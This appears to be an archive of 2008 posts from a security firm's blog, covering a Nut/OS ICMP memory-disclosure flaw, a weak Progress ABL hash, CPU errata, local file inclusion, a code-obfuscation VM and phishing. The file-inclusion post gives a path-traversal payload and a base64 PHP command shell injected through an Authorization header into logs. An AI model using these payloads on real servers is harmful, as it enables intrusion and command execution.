Exploiting Embedded Devices (Part 1)

November 17, 2008

Recently we have been assessing an increasing number of embedded devices. Seeing as the methods for carrying out this type of assessment are not at all well defined, I am starting a series of posts discussing vulnerabilities and exploitation on embedded platforms.

In recent years the exploitation of common vulnerability classes on the most popular platforms has become increasingly difficult. Although vulnerabilities are still common, especially in client side applications, exploiting these vulnerabilities often becomes a complex matter of bypassing multiple protection mechanisms including stack cookies, heap verification, and data execution prevention. However, with the move towards miniaturization, products are increasingly giving up these protections and moving to largely untested platforms. Often the base libraries and operating systems chosen for these devices contain trivially exploitable vulnerabilities.

Several months ago I assessed a product which included a networked device based on Nut/OS. This minimal operating system describes itself as follows:

Nut/OS is an intentionally simple RTOS for the ATmega128, which provides a minimum of services to run Nut/Net, the TCP/IP stack. It's features include:
+  Non preemptive multithreading.
+  Events.
+  Periodic and one-shot timers.
+  Dynamic heap memory allocation.
+  Interrupt driven streaming I/O.

Main features of the TCP/IP stack are:
+  Base protocols ARP, IP, ICMP, UDP and TCP.
+  User protocols DHCP, DNS and HTTP.
+  Socket API.
+  Host, net and default routing.
+  Interrupt driven Ethernet driver.

While assessing the device, one of the most exposed components was the network stack. Some discussion of the network stack of this minimal operating system is in order. The vulnerability I will discuss has now been patched but the vulnerable version of the operating system can be downloaded here. An incoming IP packet is passed from the device driver into NutEtherInput() and on into NutIpInput() where it is demuxed to determine its protocol and passed to the appropriate component. Within NutIpInput(), on line 187 of net/ipin.c, the length of the IP header is calculated and used without being verified for sanity. The length of the IP header is a 4 bit value which is multiplied by 4 to determine the length in 32 bit words. Later on lines 250, 251, and 252 several lengths are calculated based on this value as well as the unchecked length for the entire packet. This vulnerability leads to a number of interesting conditions throughout the network stack where pointers to protocol headers and data are calculated based on incorrect IP header lengths.

void NutIpInput(NUTDEVICE * dev, NETBUF * nb) {

ip_hdrlen = ip->ip_hl * 4;
if (ip_hdrlen < sizeof(IPHDR)) {
NutNetBufFree(nb);
return;
}

nb->nb_nw.sz = ip_hdrlen;
nb->nb_tp.vp = ((char *) ip) + (ip_hdrlen);
nb->nb_tp.sz = htons(ip->ip_len) - (ip_hdrlen);

The most interesting of these, from the perspective of exploitation, are strangely in one of the simplest protocol handlers; namely ICMP. This arises largely from the fact that the buffers allocated for incoming echo requests are reused for the responses. The responses are sent through NutIcmpOutput() in net/icmpout.c. To exploit this we need data to be written to a pointer which can be pushed forward into another chunk of heap memory by specifying an incorrect IP header length. Only two writes meet these criteria. The first is the type field of the ICMP packet and in this case will always be NULL. Although it may be possible to gain execution in some cases with the ability to overwrite heap memory with a null, in this case, there is a more interesting alternative. The second field which is written is a checksum of the ICMP portion of the packet (which is data that we control at least parts of). So, by specifying an IP header length which is larger than the true length (typically 5) and controlling the calculated checksum, we can write an arbitrary 2 bytes to any 32 bit boundary within 9 (the largest IP header length 15 minus (the smallest IP header = 5 plus the size of the ICMP header = 1)) words of the end of our packet in memory.

int NutIcmpOutput(uint8_t type, uint32_t dest, NETBUF * nb) {
ICMPHDR *icp;
uint16_t csum;
icp = (ICMPHDR *) nb->nb_tp.vp;
icp->icmp_type = type;
icp->icmp_cksum = 0;
csum = NutIpChkSumPartial(0, nb->nb_tp.vp, nb->nb_tp.sz);
icp->icmp_cksum = NutIpChkSum(csum, nb->nb_ap.vp, nb->nb_ap.sz);
return NutIpOutput(IPPROTO_ICMP, dest, nb);
}

This leads us to another difficulty, the Nut/OS heap implementation (specifically the use of singley linked lists). I will go into this in more detail in another post but for now I want to talk about another vector for the exploitation of this vulnerability. In many cases the rather limited memory of an embedded device contains information that would be useful to an attacker. Things like encryption keys, and passwords are all stored in the same address space that the network stack is operating on. If you have been following along you may see where I am going with this. When we specify a packet length (not ip->ip_hl but instead ip->ip_len) in the IP header of an ICMP echo request that is larger than the actual packet sent, a condition results where the excess length for the echo response is pulled from the memory directly after the allocated buffer. By sending a ICMP echo request with no data and a long length we can effectively read chunks of memory from the vulnerable device. To obtain the maximum amount of memory it is possible, by forcing allocations and deallocations using particulars of the TCP stack, to change the location where the packet buffer is allocated.

Visualizing the attack with ninjas

Visualizing the attack with ninjas

By manipulating the heap it is possible to rebuild large sections of the vulnerable devices memory based on the data segment of the returned ICMP responses. In many cases this will give the attacker everything they need to further compromise the system. Even when no critical encryption key or password exists in memory which can be leaked this attack is extremely useful in helping to facilitate a more typical heap corruption exploit.

I want to touch briefly on the steps that can be taken by device manufacturers to avoid this type of vulnerability. It is not sufficient to assume that because it is an embedded device it will not be attacked. As the popularity of deploying this type of system on the internet continues to grow greater numbers of attackers will focus on these platforms simply because exploitation is often easier. When deploying internet enabled devices the same precautions should be taken as with more conventional platforms like Windows and Linux. During the design process, base libraries and operating systems should be vetted through security review prior to inclusion in a product. I expect to see much more research into these platforms as ethernet adapters and wireless interfaces are added to more and more devices.


Crypto Pet Peeves: Hashing…Encoding…It’s All The Same, Right?

August 25, 2008

Patrick Toomey

© 2008 Neohapsis

We all know cryptography is hard. Time and time again we in the security community give advice that goes something like, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. Even if you think you have an unbelievably good reason I would still take pause and make sure there is no other alternative. Nearly every aspect of cryptography is painstakingly difficult: developing new crypto primitives is hard, correctly implementing them is nearly just as hard, and even using existing crypto APIs can be fraught with subtlety. As discussed in a prior post, Seed Racing, even fairly simple random number generation is prone to developer error. Whenever I audit source I keep my eyes open for unfamiliar crypto code. So was the case on a recent engagement; I found myself reviewing an application in a language that I was less familiar with: Progress ABL.

Progress ABL is similar to a number of other 4GL languages, simplifying development given the proper problem set. Most notably, Progress ABL allows for rapid development of typical business CRUD applications, as the language has a number of features that make database interactions fairly transparent. For those of you interested to learn more, the language reference manual can be found on Progress’ website.

As I began my review of the application I found myself starting where I usually do: staring at the login page. The application was a fairly standard web app that required authentication via login credentials before accessing the sensitive components of the application. Being relatively unfamiliar with ABL, I was curious how they would handle session management. Sure enough, just as with many other web apps, the application set a secure cookie that uniquely identifies my session upon login. However, I noticed that the session ID was relatively short (sixteen lower/upper case letters and four digits). I decided to pull down a few thousand of the tokens to see if I noticed any anomalies. The first thing I noticed was that the four digit number on the end was obviously not random, as values tended to repeat, cluster together, etc. So, the security of the session ID must lie in the sixteen characters that precede the four digits. However, even the sixteen characters did not look so random. Certain letters appeared to occur more than others. Certain characters seemed to follow other characters more than others. But, this was totally unscientific; strange patterns can be found in any small sample of data. So, I decided to do a bit more scientific investigation into what was going on.

Just to confirm my suspicions I coded up a quick python script to pull down a few thousand tokens and count the frequency of each character in the token. Several minutes later I had a nice graph in excel.

Histogram of Encode Character Frequency
Histogram of Encode Character Frequency

Ouch! That sure doesn’t look very random. So, I opened up Burp Proxy and used their Sequencer to pull down a few thousand more session cookies. The Burp Sequencer has support for running a number of tests, including a set of FIPS-compliant statistical tests for randomness. To obtain a statistically significant result Burp analyzes a sample size of 20,000 tokens. Since I saw that the four digit token at the end of the session ID provided little to no entropy, I discarded them from the analysis. It seemed obvious that the sixteen character sequence was generated using some sort of cryptographic hash, and the four digit number was generated in some other way. I was more interested in the entropy provided by the hash. So, after twenty minutes of downloading tokens, I let Burp crunch the numbers. About 25 seconds later Burp returned an entropy value of 0 bits. Burp returned a graph that looked like the one below, showing the entropy of the data at various significance levels.

Encode Entropy Estimation
Encode Entropy Estimation

Hmmm, maybe Burp is broken. I was pretty sure I had successfully used the Burp Sequencer before. Maybe it was user error, a bug in the current version, who knows. I decided that a control was needed, just to ensure that the tool was working the way I thought it should. So, I wrote a bit more python to simply print the hex-encoded value of a SHA1 hash on the numbers 1-20,000. I loaded this data into Burp and analyzed the data set. Burp estimated the entropy at 153 bits. Just to compare with the prior results, here is the distribution graph and the Burp entropy results for the SHA1 output:

Histogram of SHA1 Character Frequency
Histogram of SHA1 Character Frequency

SHA1 Entropy Estimation
SHA1 Entropy Estimation

I repeated the same test against a set of JSESSIONID tokens and found a similarly acceptable result. Ok, so the Burp Sequencer seems to be working.

So, I next went hunting for the session token generation code in the application. After a little greping I found the function for generating new session tokens. Ultimately the function took a number of values and ran them through a function called “ENCODE”. Hmmm, ENCODE, that didn’t sound familiar. Some more greping through the source did not reveal any function definitions, so I assumed the function must be part of the standard library for ABL. Sure enough, on page 480 of the language reference manual there was a description of the ENCODE function.

“Encodes a source character string and returns the encoded character string result”

The documentation then goes on to state:

“The ENCODE function performs a one-way encoding operation that you cannot reverse.  It is useful for storing scrambled copies of passwords in a database. It is impossible to determine the original password by examining the database. However, a procedure can prompt a user for a password, encode it, and compare the result with the stored, encoded password to determine if the user supplied the correct password.”

That is the least committal description of a hash function I’ve ever had the pleasure reading. It turns out the application, as well as a third party library the application depends upon, uses this function for generating session tokens, storing passwords, and generating encryption keys. For the sake of reproducibility I wanted to be sure my data was not the result of some strange artifact in their environment. I installed the ABL runtime locally and coded up a simple ABL script to call ENCODE on the numbers 1-20000. I reran the Burp Sequencer and got the exact same result, 0 bits.

At this point I was fairly sure that ENCODE was flawed from a hashing perspective. A good quality secure hash function, regardless of how correlated the inputs are (as the number 1-20000 obviously would be), should produce output that is indistinguishable from truly random values (see Cryptographic Hash Functions and  Random Oracle Model for more information). ENCODE clearly does not meet this definition of a secure hash function. But, 0 bits, that seems almost inconceivably flawed.  So, giving them the benefit of the doubt, I wondered if the result is dependent on the input. In other words, I conjectured that ENCODE might perform some unsophisticated “scrambling” operation on the input, and thus input with low entropy will have low entropy on the output. Conversely, input with high entropy might retain it’s entropy on output. This still wouldn’t excuse the final result, but I was curious none the less. My final test was to use the output of my SHA1 results and feed them each through the ENCODE function. Since the output of the SHA1 function contains high entropy I conjectured that ENCODE, despite its obvious flaws, might retain this entropy. The results are shown below:

Histogram of SHA1 then Encode Character Frequency
Histogram of SHA1 then Encode Character Frequency

SHA1 then Encode Entropy Estimation
SHA1 then Encode Entropy Estimation

ENCODE manages to transform an input with approximately 160 bits of entropy into an output that, statistically speaking, contains 0 bits of entropy. In fact, the frequency distribution of the character output is nearly identical to the first graph in this post.

This brings me back to my opening statement, “Unless you have an unbelievably good reason for developing your own cryptography, don’t!”. I can’t figure out why this ENCODE function exists? Surely the ABL library has support for a proper hash function like SHA1, right? Yes, in fact it does. The best explanation I could come up with is that it is a legacy API call. If that is the case then the call should be deprecated and/or  documented as suitable only in cases where security is of no importance. The current API does the exact opposite, encouraging developers to use the function for storing passwords. Cryptography is hard, even for those of us that understand the subtlety involved. Anything that blurs the line between safe and unsafe behavior only makes the burden on developers even greater.

It is unclear, based on this analysis, how much effort it would require to find collisions in ABL’s ENCODE function. But, even this simple statistical analysis should be enough for anyone to steer clear of its use for anything security related. If you are an ABL developer I would recommend that you try replacing ENCODE with something else. As a trivial example, you could try: HEX-ENCODE(SHA1-DIGEST(input)). Obviously you need to test and refactor any code that this breaks. But, you can at least be assured that SHA1 is relatively secure from a hashing perspective. That said, you might want to start looking at SHA-256 or SHA-512, given the recent chinks in the armor of SHA1:

Unfortunately, it does not appear that ABL has support for these more contemporary SHA functions in their current release.

Ok….slowly stepping down off my soapbox now.   Bad crypto just happens to be one of my pet peeves.

Footnote:

Just before posting this blog entry I decided to email Progress to see if they were aware of the behavior of the ENCODE function.  After a bit a few back and forth emails I eventually got an email that desribed the ENCODE function as using a CRC-16 to generate it’s output (it is not the direct output, but CRC-16 is the basic primitive used to derive the output).  Unfortunately, CRCs were never meant to have any security gurantees.  CRCs do an excellent job of detecting accidental bit errors in a noisy transmission medium.  However, they provide no gurantees if a malicous user tries to find a collision.  In fact, maliciously generating inputs that produce identical CRC outputs is fairly trivial.  As an example, the linearity of the CRC-32 alogirthm was noted as problematic in an analysis of WEP.   Thus, despite the API doc recommendation, I would highly recommend that you not use ENCODE as a means of securely storing your user’s passwords.


16-bit debugger goodness

August 2, 2008

It’s Saturday around Noon.  A friend is building a new server and wants to add 8 gigs of RAM to his MSI mother board but needs to flash the motherboard.  I’m bored and seems easy plus he hasn’t seen Afro Samurai so I figure we’ll upgrade his motherboard watch some anime and it will be a Saturday afternoon well spent.

Well, turns out the instructions say use a floppy…guess what?  He has no floppy drives.  He has ten computers counting the laptop I brought but no floppy drives.  Ah ok,  well this is for a Linux server but we supposedly need windows to install.  He installed windows before I got there but no go.  The software won’t run and without a floppy, and we can’t make a DOS floppy.  Believe it our not I keep a small win98boot.img file on my server for just such a reason but without a floppy I’ve got nothing.

So I go back to my house where I have tons of computers, all with floppies.  Now that I think about it I have no idea why I always add a floppy when I build a machine… but I do.  Plus I have extra drives so I grab one and some blank disks.  Hey I still have blanks from the days of Slackware boot floppies, and Novell server.exes… yeah, you remember ;)

So get this, the mother board doesn’t boot with the floppy attached.  Whatever.  We figure it should be trivial to modify the installer to use another drive letter rather than A:.  We divided our efforts.  He goes to task making a USB DOS bootable thumbdrive and I go to modify the motherboard’s installer.

As you can probably guess from this post that it was a 16-bit installer.  No problem, right?  I do 32-bit in Olly and IDA so trivial eh?  Nope,  only IDA can open such a thing but it can’t run as a debugger.  Which wouldn’t be a big deal but the binary is packed.  Packed!  Yeah for real, 16-bit and packed.

At this stage there is no turning back for me.  Meanwhile he already has his thumbdrive in DOS mode.  But I can’t debug 16-bits even in IDA.  Huh, who knew?  Well probably a lot of you but I didn’t.  So I figure, well I start up debug.exe and do it from there…nope.  No breakpoint support or anything useful.  Hmmmm, well I stumble on GRDB.  It stands for ‘Get Real’ Debugger and I have to say I was impressed.  It can handle 16-bit apps as well as 32-bit functionality.  It actually has a lot of cool functionality like PCI bus support but I didn’t need that.  What it did have was breakpoints, single stepping and step over commands.  Plus in comments it would show if a jump was taken or the contents of ES:[ax+dx].  GRDB, I love you!  :)  And just for icing on the cake they have ANSI colors.  Now how can you not love that?

GRDB comes with source:  All in ASM and it can be compiled with MASM.  All code is licensed under the GPL as well!  Woot!  By now my friend has already updated his motherboard and is intalling Linux but I’m still in fascinated mode.  I missed the RE scene from back in the 16-bit DOS days.  Granted I used debug.exe to change binaries but it was based on offsets about which people had told me.  I was not in the scene that set the precedent for debuggers today.  Now to only modify the binary to support Ruby and a .gdbinit script… ;)

But if you are stuck with a 16-bit app I recommend GRDB, or if you want to write a packer that modern debuggers choke on…go old school.  (PS.  I laughed when I unpacked it and fired up ImpRec just to see NTVDM.EXE was all that was running :P)  I forget how spoiled I am nowadays but this Saturday afternoon I found a surprisingly useful gem.

–Craig


Exploiting Erroneous Errata

August 1, 2008

Recently I was reading through the line-up for the Hack in the Box Conference which will be held in Malaysia this October. The following talk made my ears perk up: “Remote Code Execution Through Intel CPU Bugs” By Kris Kaspersky. Briefly, this talk will cover the exploitation of Intel processor errata. Yes you heard that right, Kris has managed to exploit hardware bugs. He goes on to say that they have developed PoC code which allows for remote exploitation of at least on of these bugs.

When I first came across this I was impressed to say the least. I decided to re-read the Intel Errata to see if I could spot the exploitable conditions. There was some discussion when these were first released, including speculation into the exploitability of several of these, but like most people I didn’t think much of it (OS developers flip out all the time).

After reading through the Intel Core 2 documents I decided to check out the revisions for the Athlon 64 as well. That’s where I ran across this gem:

Errata 95: “RET Instruction May Return To Incorrect EIP”

Speaking of exploitability… Lets see what causes this.

In order to efficiently predict return addresses, the processor implements a 12-deep return address stack to pair RETs with previous CALLs.

Under the following unusual and specific conditions, an overflowed hardware return stack may cause a RET instruction to return to an incorrect EIP in 64-bit systems running 32-bit compatibility mode applications:

• A CALL near is executed in 32-bit compatibility mode.
• Prior to a return from the called procedure, the processor is switched to 64-bit mode.
• In 64-bit mode, subsequent CALLs are nested 12 levels deep or greater.
• The lower 32 bits of the 64-bit return address for the 12th-most deeply nested CALL in 64-bit mode matches exactly the 32-bit return address of the original 32-bit mode CALL.
• A series of RETs is executed from the nested 64-bit procedures.
• The processor returns to 32-bit compatibility mode.
• A RET is executed from the originally called procedure.

So lets assume you have a 32 bit application running in compatibility mode that you would like to exploit and can force a somewhat long function to be repeatedly called.  You could create a 64 bit thread with a very tight function that recursively calls itself 12 times and returns to a address which matches (lower 32 bits) the return of the function you are targeting.This would create a bit of a race, but it would be very winnable given a slightly complex target and a tight exploit loop.

Of course the errata doesn’t detail what the incorrect return address might be but assuming it can somehow be predicted or controled this could be a fun little bug. This specific bug only exists on a small subset of AMD hardware, specifically CPUIDs 0xF51, 0xF58, and 0xF48. If anyone has a processor with the bug and would like to experiment with it I would love to hear from you.


Local File Inclusion – Tricks of the Trade

July 21, 2008

By: Cris Neckar, Andrew Case

Everyone understands that local file includes are bad. The ability to execute an arbitrary file as code is unquestionably a security risk and should be protected against. However, the process of exploitation can be rather involved and is commonly misunderstood. In this post I want to clarify the risks involved in this type of vulnerability and the complications involved in exploitation.

To start lets give a bit of background. I will focus on PHP on Linux specifically but this class of vulnerability may also exist in many other interpreted languages on different platforms. Generically, a file inclusion vulnerability is the dynamic execution of interpreted code loaded from a file. This file could be loaded remotely from an http/ftp server in the case of remote inclusions, or as I will cover, locally from disk. Generally remote file inclusion vulnerabilities are trivial to exploit so I will not be covering them. The following line is an example of a local file inclusion vulnerability in PHP:

require_once($LANG_PATH . ‘/’ . $_GET[‘lang’] . ‘.php’);

In this case an attacker controls the “lang” variable and can thereby force the application to execute an arbitrary file as code. The attacker does not however control the beginning of the require_once() argument, so including a remote file would not be possible. To exploit this an attacker would set the ‘lang’ variable to a value similar to the following:

lang=../../../../../../file/for/inclusion%00

Before we get into discussing the exploitation of this type of vulnerability let me say a few words about preventing them. In the preceding case, the vulnerability could be trivially mitigated through input validation. A simple check for non-alphanumeric characters would suffice in this case. However, where possible I would recommend completely avoiding user input for this type of logic and instead selecting the proper include from a hardcoded list of known good files based on a user supplied index number or hash.

Now that we know how to avoid these when developing applications lets get back to methods of exploitation. A straight forward vulnerability such as this one can in fact be quite difficult to reliably exploit given the differences in deployment platforms. When developing an exploit the first question to ask yourself is generally “what do I need for successful exploitation?”. In this case, the answer to that question is a file stored locally on the target system which contains PHP code that accomplishes our goal. In the best case we will be able to include a file which we directly control the contents of.

This can be an interesting puzzle as it is almost a case of chicken before the egg. To gain access to the remote system we need the ability to create a file on the remote system. The first possibility, and by far the simplest, is to look at the features provided by the application we are attacking. For example, many local inclusion exploits use features such as custom avatars and file storage mechanisms to place code on the target system. Bypassing various checks performed on these types of files/images can be an interesting puzzle in itself and the details are best saved for a future post. However, we want to talk about these vulnerabilities on systems which do not allow such trivial exploitation.

If the target application does not provide some way of uploading or changing a file on disk we need to examine other options. I suggest examining all access to the target server. Ask yourself “What services are available to me and what files to they access? Do I control any of the data written to these files?”. An anonymous FTP server or similar would certainly make life easier here but that would be to good to be true. :)

Generally when people discuss local includes the assumption is that the target file will be the HTTP servers logs. It is quite easy to influence the contents of log files as their purpose is to store the requests that you, the user, make. Most people will suggest the logs and conveniently glaze over the complexities that their usage presents. There are several major potential hurdles in the use of logs.

First we run into the problem of finding the logs. In a production environment it is rare to use default paths for log data, ‘/var/log/httpd/access_log’ is simple enough to guess but what do you do when the log is stored in ‘/vol001/appname.ourwidget.com/log’. Guessing this path would be non-trivial at best and even assuming that verbose error messages or a similar information disclosure gives you some hint to directory structure, using these methods in a reliable exploit would be extremely difficult.

To jump this hurdle lets examine an interesting feature of the Linux proc file-system, namely, the ‘self’ link. The Linux kernel exports a good bit of interesting information about individual processes to usermode through the proc entries for each process id. It also creates an entry called ‘self’ which provides a process easy access to its own process information. When we access /proc/self through the context of a PHP include the link will, in most cases, point to the process entry for the httpd child which has instantiated to PHP interpreter library (This may not be the case if the interpreter has been called as CGI). Often when an HTTPd is run, the path to its configuration file is passed as an argument. If this is the case, finding the log file is a simple procedure of including ‘/proc/self/cmdline’, reading the location of the configuration file and including it to find the path to log files.

Viewing the apache cmdline proc entry

Viewing the apache cmdline proc entry

If the ‘cmdline’ entry does not contain the configuration file there is another option. The per process proc entry also contains a directory entry called ‘fd’. This directory exports a numbered entry for each file descriptor that the process currently holds. In writing PoC for this post on a 2.6.20 kernel we noticed that at some point a kernel developer had the foresight to set the permissions on these entries so that they could be read only by the instantiating user. We tasked intern Y with finding the change and, after grepping the diffs of every kernel release (ever… i.e. wget -r –no-parent http://www.kernel.org/pub/linux/kernel/) he found the following. In May of 2007 the following patch was entered to address the case where a process opens a file and then drops its permissions (Interesting, that is exactly what Apache does).

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=8948e11f450e6189a79e47d6051c3d5a0b98e3f3

This change was committed around the release of version 2.6.22. Using this new access we are able to directly access the files opened by the apache process through these proc entries. By iterating the file name from ‘0’ we are able to directly access the HTTPd log file which will undoubtedly be open for use by the web server. Simply include the files ‘/proc/self/fd/<fd number>’ until you hit on the right file descriptor.

Using the fd proc entries to access apache logs

Using the fd proc entries to access apache logs

Great, so we found the log file. Now we need to determine what fields we actually control. It is commonly believed that you can arbitrarily enter text into apache logs by putting code into GET variables or the requested path. This is generally not the case as these values will almost always be URL encoded and will therefore not execute correctly. I find the simplest field to use is actually the user name. This is pulled from the Authorization header which is typically base64 encoded and thereby avoids the URL encoding mechanisms. By base64 encoding a string similar to the following:

<?php passthru($_GET[‘cmd’]); ?>:doesn’t matter

And specifying an Authorization header as follows:

Authorization: Basic PD9waHAgcGFzc3RocnUoJF9HRVRbJ2NtZCddKTsgPz46ZG9lc24ndCBtYXR0ZXI=

We can insert arbitrary code into the HTTP logs.

PHP code as basic auth username

PHP code as basic auth username

Assuming the stars align and this method is successful there is still one more caveat. On production HTTP servers the logs files tend to be rather large, often in the range of 200mb. Your PHP code is going to be at the very end of the current log file which will likely mean that for each command you run it will take a very long time (depending on connection speed) to wait for the page to display the output from your command. It is possible to use the error_log as this is likely somewhat smaller, but these can still be rather larger than we would hope.

We now have somewhat reliable ways to get code execution, but I hear you saying “There must be a better way”. I am going to present a method which is specific to PHP and somewhat specific to the target application. This is a very common scenario but if it does not fit your needs I hope that it will at least help you to get into the right mindset for this type of exploit development.

PHP provides a mechanism for maintaining session state across requests. Many other languages provide similar interfaces but their internals are sometimes quite different. In the case of PHP a session is started using, logically enough, session_start(). This code can be found is ‘/ext/session/session.c’ within the PHP codebase. Briefly, it checks whether a session cookie was sent with the current request, if not it creates a random session id and sets the cookie within the response to the user. It also registers the global $_SESSION variable which is directly tied to a file stored in the temporary directory. This file will contain any variables set under the session context formatted as a PHP array.

In the case of an application which tracks session information, any setting stored as a string which the user controls could provide an excellent target for a local file include vulnerability. The session file will be named ‘sess_<session_id>’. Although the session_id is a random hash it is trivial to retrieve as it is stored locally in a cookie.

Viewing the PHP session cookie

Viewing the PHP session cookie

In our simple example, our session has a few variables but the simplest to control arbitrarily is a field called ’signature’. PHP applications tend to store all sorts of interesting things in session variables and there is often a string that you control arbitrarily. In this case by setting our ‘signature’ to PHP code we can gain command execution through this session file.

Putting it all together

Putting it all together

Although the specific methods I have outlined here will not always work in your particular situation I hope that I have at least prompted some interest in the many possibilities for exploiting this type of vulnerability. Regardless of how limited you feel by the platform you are exploiting there is almost always some trick that you can use to get the better of the system.


MiniVM RECON Release

June 14, 2008

Here are the slides for the talk I gave at RECON.  The talk was on “Creating Code Obfuscating Virtual Machines”.  The videos of all the talks will also be made available on the RECON website as well.  To get started writing your own virtual machine or programing for the MiniVM you’ll need to download the MiniVM suite (See below).  This has the core CPU (aka VM) under core/minivm.inc.  This file was intended to be compiled by MASM.  You could of course compile this to an object file and link it into your C code.

There is also a directory for compilers.  There is currently just one and it’s Ruby based.  This compiler is easily extensible so you can use this compiler for any VM you decide to create yourself.  This should speed up and give you a lot more flexibility when writing your own VMs.  Both the Compiler and the VM core *should* be able to compile on other platforms but I haven’t tested compiling the core with NASM yet.

These operands are currently support by MiniVM

  • MOV r32, r32
  • MOV [r1], r32
  • MOV r1, [r1]
  • MOV r32, value
  • CMP r32, value
  • INC/DEC r32
  • ADD/SUB r32, value
  • AND/OR r1
  • XOR r32,r32
  • PUSH/POP r32
  • JMP (Relative address / Direct Address)
  • JE, JL, JG value
  • CALL r1/value
  • EXIT

r32 in most cases means any of the registers.  If you are using the supplied compiler and you enter an unsupported use of an operand it will not only give an error but it will also show you all the possible valid ways to use that operand.

You basically have 4 general purpose registers: r1, r2, r3, and r4.  With r1 being a primary register.  Every operand works with that but not necessarily the others.  You also have the registers IP and SP for Instruction pointer and stack pointer manipulation.  As well as a few others.  See the slides for more information or simply look at the core source.

I will be maintaining both MiniVM and the compiler.  Please send me any patches or updates to either of these.  Also if you write anything really cool for MiniVM I would like to see that as well.  I’m sure the solutions for the Crackme will fill up quick but if you write up a good tutorial send that to me and I’ll post it as well.

Download:

miniVM

Slides

miniVMCrackme1

Send emails to: crag.smith at neoahpsis.com


RECON 2008

June 9, 2008

I will be giving a talk at the RECON conference in Montreal this weekend (June 13-15).  For those of you who haven’t been to RECON it is a fantastic conference.  RECON considers itself a security conference but it is much more than that.  There are many very technical talks that typical involve the different aspects of reverse engineering just about anything.  Perfect for security researchers, the anti-virus community or anybody interested on studying the inner workings of things.

I am very excited to be presenting in Montreal and have some fun tools to release after the talk.  My talk is about writing your own virtual machine for the purposes of code obfuscation.  It should be around Noon-ish on Saturday but that time may change.  The goal of the talk is to not just teach what an embedded virtual machine is or how it works but also to allow you to build your own.  I will be releasing a virtual CPU that you can play with as well as an assembler like language you can use to compile code for your virtual machine.  The compiler is written in Ruby and is easily extended so you can quickly write your own language for your own processor.  I will also have a crackme to release to play with as well :D

Should be lots of fun!  I’ll be there on Friday but I will be taking off early morning on Sunday to get home for fathers day (Need to support the lil’ Neophites).  So be sure to ‘Hi’ at the party.

–Craig Smith

Updated to include posted link to crackme


Easiest Way into a Company

May 22, 2008

One web page and one email is all you need to gain access to a major corporation’s internal network. Catchy I know, but this is not an exaggeration of what an attacker can do to gain access on their internal network. In culmination with exploiting a few systems on the internal network, they can have free reign. Securing your network infrastructure begins with your employees. I don’t think you will be able to extract any new techniques or any new concepts from this post; however, this should shed some light and acknowledge the importance of safe end user practices as well as securing internal networks and resources.

Much of the governance and regulatory focus is securing your external networks, but what if they get in? We have seen a rise in external vulnerability scans and a decrease in internal/external penetration tests. Did we forget security awareness, defense in depth, network architecture or even the most basic administrative practices? Not surprisingly, it seems corporations are searching for that check mark on their audit and not concerned with actual security.

So what, right?

Even the most security-aware corporations’ are still falling victim to social engineering exercises. Valuable resources which an attacker can use are found in the most trivial places such as social networking sites. Anyone can acquire an adequate employee list in minutes with all the social networking sites such as Linkedin, Facebook, Myspace, etc. From the vast amount of information that can be collected from social networking sites, message boards, and online-groups you can realistically create an organization chart (which helps addressing employees and providing focus for your phishing attack).

Scenario:

Currently, much of the workforce has logged into a VPN or OWA once in their lifetimes. Corporations are offering many services remotely to keep their workers adequately connected. These basic infrastructure items seem the most prone and widespread systems for an attacker to prey on. The first step an attacker makes is basic recon and choosing their targets. Often employees in administrative or sales roles are selected because they tend to login to resources remotely. Next, an attacker will search for an external facing login prompt to clone it to a dummy system with a basic logging to record IP and user credentials. After that, well crafted emails directing unsuspecting users to the dummy login…Done. Simple as that, login credentials obtained within minutes.

How do we protect from here:

There are three fronts that could dramatically improve the outcome of these scenarios. First off, end user training and policies geared towards making employees more aware of possible attacks and best practices. I am not talking about handing a policy to the employee and having them read it either. Second, internal penetrations tests still are viable and will cover a number of areas that will protect from employee attacks as well as minimizing potential sophisticated attacks. This may include additional tasks of hardening of hosts, segregation of networks/assets, and adjusting the appropriate policies. Third, static passwords on critical systems externally facing should be changed to a more secure method such as token authentication. The truth is there is no magic bullet to prevent phishing or social attacks, we will always be combating the human tendency to trust.


My $0.02 on PCI DSS 6.6.

May 6, 2008

The PCI Security Council on April 15, released clarification on DSS requirement 6.6.

Requirement 6.6 states that all web facing applications are protected against known attacks by having a code review or installing an application-layer firewall (WAP) in front of the web application.

I am of the opinion that the clarification document for requirement 6.6 still does not address the issue adequately, and leaves mis-interpretations about code review and WAP.

Let’s start off with observation #1.

From the Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified document:

“Manual reviews/assessments may be performed by a qualified internal resource or aqualified third party. In all cases, the individual(s) must have the proper skills andexperience to understand the source code and/or web application, know how to evaluate each for vulnerabilities, and understand the findings. Similarly, individuals using automated tools must have the skills and knowledge to properly configure the tool andtest environment, use the tool, and evaluate the results. If internal resources are being used, they should be organizationally separate from the management of the application being tested. For example, the team writing the software should not perform the final review or assessment and verify the code is secure.”

What qualifies a qualified internal resource? Does the QSA qualify this internal resource?

There currently is no standard certification in our industry for code review, and in my experience, very few organizations have any staff that could perform adequate code review if the focus is on identifying security relevant issues.

Scenario 1: Development team uses someone from the IT/QA group to run a web application vulnerability scanner against their web application.

Does this meet Requirement 6.6?
Absolutely not.

Web application vulnerability scanners do not find all vulnerabilities, in addition, they throw out a lot of false positives.. Here at Neohapsis we have seen that and so have others, Rolling review: Web Application Scanners.

“Ultimately, you can’t automate your way to secure software–any combination of analysis tools is only as effective as the security knowledge of the user. As Michael Howard, co-author of Writing Secure Code (Microsoft Press, 2002) and one of the lead architects of Microsoft’s current security posture, put it in his blog: “Not-so-knowledgeable-developer + great tools = marginally more secure code.”

We recommend taking advantage of documented processes, including Microsoft’s SDL (Security Development Lifecycle), The Open Web Application Security Project’s CLASP (Comprehensive Lightweight Application Security Process) and general techniques available at the National Cyber Security Division’s “Build Security In” portal (Automated Code Scanners.” Network Computing Magazine, April 16, 2006).

Web application vulnerability scanners should be used as a tool in conjunction with a full code review.

Observation #2: Option #2 in Requirement 6.6.

I find this to be the band-aid approach to passing 6.6. Web application firewalls, WAF, should be used as an additional layer of security, not a band-aid and avoiding code reviews. Would we consider an IDS or a firewall to be the resolution to running unnecessary services on a system, or a solution to avoid us from hardening or configuring systems to best practice of vendor recommended guidelines? Similarly, WAF’s are another step in the principle of Defense-in-Depth (DiD), but are in no means a solution to securing an application.

